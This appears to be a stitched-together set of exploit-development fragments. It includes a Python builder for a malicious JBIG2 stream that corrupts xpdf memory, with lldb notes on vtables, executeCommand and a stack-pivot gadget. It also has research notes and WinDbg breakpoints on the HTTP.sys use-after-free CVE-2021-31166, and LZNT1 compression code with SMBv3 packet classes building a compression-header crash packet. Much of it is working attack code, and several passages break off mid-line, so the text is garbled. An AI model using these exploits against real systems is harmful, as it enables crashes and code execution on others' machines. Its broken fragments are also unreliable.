len(grrs.raw())) 674 | f.write(grrs_sh.raw() + grrs.raw()) 675 | 676 | grrs = genericRefinementRegionSegment(0x1, 0x1, ((data_buffer_to_bitmap_data + 3 - (i // 8)) << 3) + (i % 8), 0, 0, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 677 | grrs_sh = segmentHeader(0xcafe + i, STORE, 0, 1, len(grrs.raw())) 678 | f.write(grrs_sh.raw() + grrs.raw()) 679 | 680 | # append segment (brings list up to 0x20), will overwrite this pointer in the segment list 681 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\xff\x7f\xff\xac") 682 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 683 | f.write(grrs_sh.raw() + grrs.raw()) 684 | 685 | for i in range(0, 0x1f): 686 | # write buffer address into list 687 | grrs = genericRefinementRegionSegment(0x1, 0x1, (((data_buffer_to_segments + (0x8 * (0x1f - i))) + 0x3 - (i // 8) ) << 3) + (i % 8), 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 688 | #grrs = genericRefinementRegionSegment(0x1, 0x1, ((data_buffer_to_segments + (0x8 * (0x1f - i))) << 3) + i, 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 689 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xcafe + i), 1, len(grrs.raw())) 690 | f.write(grrs_sh.raw() + grrs.raw()) 691 | 692 | # restore a placeholder 693 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\xff\x7f\xff\xac") 694 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 695 | f.write(grrs_sh.raw() + grrs.raw()) 696 | 697 | # trigger the write with the spoofed bitmap 698 | replace_bytes_at_offset(f, struct.pack("I", 0xdeadbeef), 1, len(grrs.raw())) 707 | f.write(grrs_sh.raw() + grrs.raw()) 708 | f.write(toggle_debug_sh.raw()) 709 | 710 | 711 | f.write(debug_sh.raw()) 712 | f.write(final_debug_sh.raw()) 713 | 714 | # write 715 | """ 716 | (lldb) x/5a 0x1001645e8 (vtable) 717 | 0x1001645e8: 0x00000001000a1d10 xpdf`JBIG2Bitmap::~JBIG2Bitmap() at JBIG2Stream.cc:763 718 | 0x1001645f0: 0x00000001000a1d20 xpdf`JBIG2Bitmap::~JBIG2Bitmap() at JBIG2Stream.cc:763 719 | 0x1001645f8: 0x00000001000aab70 xpdf`JBIG2Bitmap::getType() at JBIG2Stream.cc:692 720 | 721 | executeCommand is 0x819C0 under JBIG2Bitmap::getType() 722 | add 0xFFFFFFFFFFF7E640 to emulate subtraction (lol) 723 | 724 | 1 match found in /Users/jeff/Desktop/shared/xpdf-4.03-clean/build/xpdf-qt/xpdf: 725 | Address: xpdf[0x00000001000291b0] (xpdf.__TEXT.__text + 137232) 726 | Summary: xpdf`executeCommand(char*) at gfile.cc:531 727 | 728 | (lldb) x/5a 0x01001645e8 729 | 0x1001645e8: 0x00000001000a1d10 xpdf`JBIG2Bitmap::~JBIG2Bitmap() at JBIG2Stream.cc:763 730 | 0x1001645f0: 0x00000001000a1d20 xpdf`JBIG2Bitmap::~JBIG2Bitmap() at JBIG2Stream.cc:763 731 | 0x1001645f8: 0x00000001000aab70 xpdf`JBIG2Bitmap::getType() at JBIG2Stream.cc:692 732 | 0x100164600: 0x0000000000000000 733 | 734 | executeCommand is 0x819C0 under JBIG2Bitmap::getType() 735 | above getType() 736 | 737 | gadget to stack pivot... now how to get data onto stack? 738 | 0x0000000100040fd7 : pop rsp ; ret 739 | 740 | """ 741 | 742 | 743 | 744 | """ 745 | replace_bytes_at_offset(f, struct.pack("()<->()->* 19 | 20 | processes the entire string "aa, bb, cc, etc," 21 | nodes are allocated for unknown content-codings in the paged memory pool 22 | 23 | allocated nodes are freed in all but one case immediately by 24 | UlFreeUnknownCodingList using the ORIGINAL ROOT NODE (the one on the stack) 25 | 26 | after parsing all content-codings specified, if there are additional nodes 27 | in the unknown content-codings list, the nodes are unlinked from the root node 28 | and relinked to another root node in an internal structure (Request). 29 | The original root nodes next and previous links aren't reset 30 | 31 | IS: 32 | request->root: 33 | *<-(old_prev)<->(new_root)<->(old_next)->* 34 | original root: 35 | *<-(old_prev)<->(root)<->(old_next)->* 36 | SHOULD BE: 37 | request->root: 38 | *<-(old_prev)<->(root)<->(old_next)->* 39 | original root: 40 | (root)<->(root)<->(root) 41 | 42 | 43 | a content-coding string containing just "," will throw error 44 | 0x0c0000225. The unknown content-coding list is migrated to 45 | the request struct before the error is handled. 46 | The entry into UlFreeUnknownCodingList is where the first free, 47 | and the use after free, occur 48 | 49 | UlFreeUnknownCodingList: 50 | frees nodes in the order they were added to the list (head->next->...tail) 51 | starts with the first non-root node, so head->next 52 | 53 | This function is called on the original root, which has broken next and prev 54 | pointers 55 | (request->root) 56 | /|\ 57 | | 58 | \|/ 59 | *<-(old_prev)<->(root)->(old_next)->* 60 | /|\ 61 | | 62 | freeing 63 | 64 | HTTP!UlFreeUnknownCodingList unlinks this node from the internal structure root 65 | node instead of the passed in the original root node. 66 | 67 | (request->root) 68 | 69 | *<-(old_prev)<->(root)->(old_next)->* 70 | /|\ 71 | | 72 | freeing 73 | 74 | The node is free, integrity checks are performed, but they fail. 75 | Previous of old_next points to request->root. old_next is up for freeing 76 | again. BEFORE the free, sanity checking sees that the previous node 77 | is the original root, but the original root's next is old_next_next 78 | (after unlinking old_next)/ old_next is used (after freed) for sanity checks, 79 | they fail, and the kernel panics 80 | 81 | Can you generate this error with a list of length 1? root would point to root 82 | after the free? 83 | 84 | Can't generate error with list of length 1 85 | 86 | After looking at this, I don't see how this could be exploited. 87 | Even locally, if you could somehow control the memory of the free node 88 | (very fast process, small window to get the memory reassigned), you'd 89 | also have to have an info leak (for remote) to pass the sanity check during 90 | unlinking. All in all this does not seem like a good bug to exploit, 91 | but I realize that there may be things I don't know. Excited to see if 92 | someone pushes this further. 93 | 94 | """ 95 | """ 96 | https://github.com/0vercl0k/CVE-2021-31166 97 | The bug itself happens in http!UlpParseContentCoding where the function has 98 | a local LIST_ENTRY and appends item to it. When it's done, it moves it into 99 | the Request structure; but it doesn't NULL out the local list. The issue 100 | with that is that an attacker can trigger a code-path that frees 101 | every entries of the local list leaving them dangling in the Request object. 102 | 103 | """ 104 | """ 105 | parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys') 106 | parser.add_argument('--target', required = True) 107 | args = parser.parse_args() 108 | """ 109 | 110 | """ 111 | jeff bug notes 112 | 113 | free aparently in UlpParseContentCoding 114 | 115 | crash occurs in 2nd call to UlFreeUnknownCodingList in 116 | UlpParseAcceptEncoding. 117 | 118 | bug is use after free, it seems that a double free 119 | on the same LIST_ENTRY causes this bugcheck/crash 120 | 121 | only 4 calls to UlFreeUnknownCodingList 122 | only one of them hits on the crash, so use after free is coming from a call directly 123 | to ExFreePoolWithTag 124 | 125 | to find first free, break on every free and check if buffer contains our header content 126 | 127 | bp nt!ExFreePoolWithTag ".if (@retreg == dodgyVal) {db rcx;} .else {gc}" 128 | ^ this method did not work, I ended up trying the conditional: 129 | .if (@rcx != 0) { as /ma ${/v:EventName} @rcx } .else { ad /q ${/v:EventName} } 130 | .if ($spat(@"${EventName}", "AAAA*") == 0) { gc } .else { .echo EventName } 131 | 132 | now turning on heap asan and seeing where that gets me 133 | "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\gflags.exe" /k +hpa +ust 134 | 135 | UlpParseContentCoding(*char headerText, 13, null, null, ) 136 | pointer to string of header text 137 | 138 | 139 | mov r10, qword ptr [HTTP!_imp_ExFreePoolWithTag (fffff803`28535c38)] ds:002b:fffff803`28535c38={nt!ExFreePool (fffff803`229b1010)} 140 | 141 | bp HTTP!UlpHandleRequest 142 | bp nt!ExFreeHeapPool "$$> i & 1): 13 | out += chunk[0:1] 14 | chunk = chunk[1:] 15 | else: 16 | flag = struct.unpack('= 0x10: 21 | l_mask >>= 1 22 | o_shift -= 1 23 | pos >>= 1 24 | 25 | length = (flag & l_mask) + 3 26 | offset = (flag >> o_shift) + 1 27 | 28 | if length >= offset: 29 | tmp = out[-offset:] * int(0xFFF / len(out[-offset:]) + 1) 30 | out += tmp[:length] 31 | else: 32 | out += out[-offset:-offset+length] 33 | chunk = chunk[2:] 34 | if len(chunk) == 0: 35 | break 36 | return out 37 | 38 | def decompress(buf, length_check=True): 39 | out = bytes() 40 | while buf: 41 | header = struct.unpack(' len(buf[2:]): 44 | raise ValueError('invalid chunk length') 45 | else: 46 | chunk = buf[2:2+length] 47 | if header & 0x8000: 48 | out += _decompress_chunk(chunk) 49 | else: 50 | out += chunk 51 | buf = buf[2+length:] 52 | 53 | return out 54 | 55 | def _find(src, target, max_len): 56 | result_offset = 0 57 | result_length = 0 58 | for i in range(1, max_len): 59 | offset = src.rfind(target[:i]) 60 | if offset == -1: 61 | break 62 | tmp_offset = len(src) - offset 63 | tmp_length = i 64 | if tmp_offset == tmp_length: 65 | tmp = src[offset:] * int(0xFFF / len(src[offset:]) + 1) 66 | for j in range(i, max_len+1): 67 | offset = tmp.rfind(target[:j]) 68 | if offset == -1: 69 | break 70 | tmp_length = j 71 | if tmp_length > result_length: 72 | result_offset = tmp_offset 73 | result_length = tmp_length 74 | 75 | if result_length < 3: 76 | return 0, 0 77 | return result_offset, result_length 78 | 79 | def _compress_chunk(chunk): 80 | blob = copy.copy(chunk) 81 | out = bytes() 82 | pow2 = 0x10 83 | l_mask3 = 0x1002 84 | o_shift = 12 85 | while len(blob) > 0: 86 | bits = 0 87 | tmp = bytes() 88 | for i in range(8): 89 | bits >>= 1 90 | while pow2 < (len(chunk) - len(blob)): 91 | pow2 <<= 1 92 | l_mask3 = (l_mask3 >> 1) + 1 93 | o_shift -= 1 94 | if len(blob) < l_mask3: 95 | max_len = len(blob) 96 | else: 97 | max_len = l_mask3 98 | 99 | offset, length = _find(chunk[:len(chunk) - len(blob)], blob, max_len) 100 | 101 | # try to find more compressed pattern 102 | offset2, length2 = _find(chunk[:len(chunk) - len(blob)+1], blob[1:], max_len) 103 | if length < length2: 104 | length = 0 105 | 106 | if length > 0: 107 | symbol = ((offset-1) << o_shift) | (length - 3) 108 | tmp += struct.pack('> (7 - i)) 118 | out += tmp 119 | 120 | return out 121 | 122 | def compress(buf, chunk_size=0x1000): 123 | out = bytes() 124 | while buf: 125 | chunk = buf[:chunk_size] 126 | compressed = _compress_chunk(chunk) 127 | if len(compressed) < len(chunk): # chunk is compressed 128 | flags = 0xB000 129 | header = struct.pack('I",len(data)) 74 | self.data = data 75 | self.bytes = self.size + self.data 76 | 77 | def raw(self): 78 | return self.size + self.data 79 | 80 | 81 | class SMBSessionSetup: 82 | SECURITY_BLOB = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x31\x90\x88\xe2" \ 83 | b"\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00" \ 84 | b"\x06\x01\xb1\x1d\x00\x00\x00\x0f" 85 | 86 | def __init__(self, flags, security_mode, capabilities, channel, blob_offset, 87 | blob_length, previous_session_id, security_blob): 88 | self.structure_size = b"\x19\x00" 89 | self.flags = flags 90 | self.security_mode = security_mode 91 | self.capabilities = capabilities 92 | self.channel = channel 93 | self.previous_session_id = previous_session_id 94 | self.blob_offset = blob_offset 95 | self.blob_length = blob_length 96 | self.security_blob = security_blob 97 | 98 | def raw(self): 99 | return self.structure_size + self.flags + self.security_mode + self.capabilities + \ 100 | self.channel + self.blob_offset + self.blob_length + self.previous_session_id + \ 101 | self.security_blob 102 | 103 | 104 | class SMBCompressionTransformHeader: 105 | def __init__(self, protocol_id, original_size, compression_algorithm, reserve, offset): 106 | self.protocol_id = protocol_id 107 | self.original_size = original_size 108 | self.compression_algorithm = compression_algorithm 109 | self.reserve = reserve 110 | self.offset = offset 111 | 112 | def raw(self): 113 | return self.protocol_id + self.original_size + self.compression_algorithm + \ 114 | self.reserve + self.offset 115 | 116 | 117 | ######################################## 118 | # Packet contructors 119 | ######################################## 120 | 121 | def CrashPacket(): 122 | # data is necessary for crash 123 | data = b'A' * 0xffff 124 | h = SMBCompressionTransformHeader( 125 | b"\xfc\x53\x4d\x42", # protocol_id 126 | struct.pack("